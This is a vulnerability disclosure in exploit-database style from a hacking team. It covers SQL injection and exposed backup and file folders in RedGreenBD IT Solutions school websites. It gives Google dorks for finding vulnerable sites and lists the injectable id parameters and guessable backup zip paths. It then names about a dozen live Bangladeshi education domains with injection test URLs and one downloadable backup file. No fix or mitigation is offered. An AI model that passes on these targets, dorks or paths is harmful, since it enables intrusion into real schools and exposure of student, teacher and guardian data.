###################################################################
# Exploit Title : RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/01/2019
# Vendor Homepage : redgreenbd.com
# Vendor Version : PHP 5.4.45 - LiteSpeed Server - jQuery 1.3.2
# Software Download Link : N/A
# Software : Priced => See Here => redgreenbd.com/pd.php
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''Design & Developed by : RedGreenBD IT Solutions''
intext:''Designed by RedGreenBD IT Solutions''
intext:''Developed by RedGreenBD ITS"
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200: Information Exposure
CWE-538: File and Directory Information Exposure
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-redgreenbd-it-solutions-multiple-vulnerabilities.html
###################################################################
# Admin Panel Login Path / Student-Teacher-Guardian Panel Path =>
***********************************************************
/index.php?q=login-form
/?q=login
/?q=student-login
/wadmin
# SQL Injection Exploit :
**********************
/?q=newsDetail&id=[SQL Injection]
/?q=news-detail&id=[SQL Injection]
/?q=notice-detail&id=[SQL Injection]
/?q=page-detail&id=[SQL Injection]
/?q=home-block&id=[SQL Injection]
/index.php?q=news-detail&id=[SQL Injection]
# Backup Disclosure Exploit [ Example ] =>
***************************************
Look at this /uploads/ folder for backup files.
/uploads/uploads_backup_[DAY]_[MONTH]_[YEAR].zip
/uploads/uploads_backup_18_12_18.zip
/uploads/uploads_backup_21_11_18.zip
# Arbitrary File Disclosure =>
**************************
Look at this folder.
/uploads/....
/uploads/booklist/ => PDF Files here
/uploads/mnews/ => PDF Files here
/uploads/result/ => PDF Files here
/uploads/routine3/ => PDF Files here
/uploads/syllabus/ => PDF Files here
###################################################################
# Example Vulnerable Sites =>
Note => Bangladesh Education Sites are vulnerable for this security issue.
(104.152.168.23) => There are 899 domains hosted on this server.
[+] dhankhalimuss.edu.bd/?q=newsDetail&id=13%27 =>
+ Proof of Concept for SQL Injection => archive.vn/EJDgW
[+] cmpi.edu.bd/?q=newsDetail&id=13%27
[+] panchjuniadss.edu.bd/?q=newsDetail&id=13%27
[+] ths.edu.bd/?q=newsDetail&id=13%27
[+] rmss.edu.bd/?q=newsDetail&id=13%27
[+] pakhimarapvss.edu.bd/?q=notice-detail&id=3%27
[+] tsbghs.edu.bd/?q=page-detail&id=3%27
[+] nipi.edu.bd/?q=newsDetail&id=13%27
[+] cppi.edu.bd/?q=newsDetail&id=13%27
[+] bsidhaka.edu.bd/?q=newsDetail&id=13%27
[+] bsidhaka.edu.bd/uploads/uploads_backup_21_11_18.zip
###################################################################
# SQL Database Error :
You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near ''13''' at line 1
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################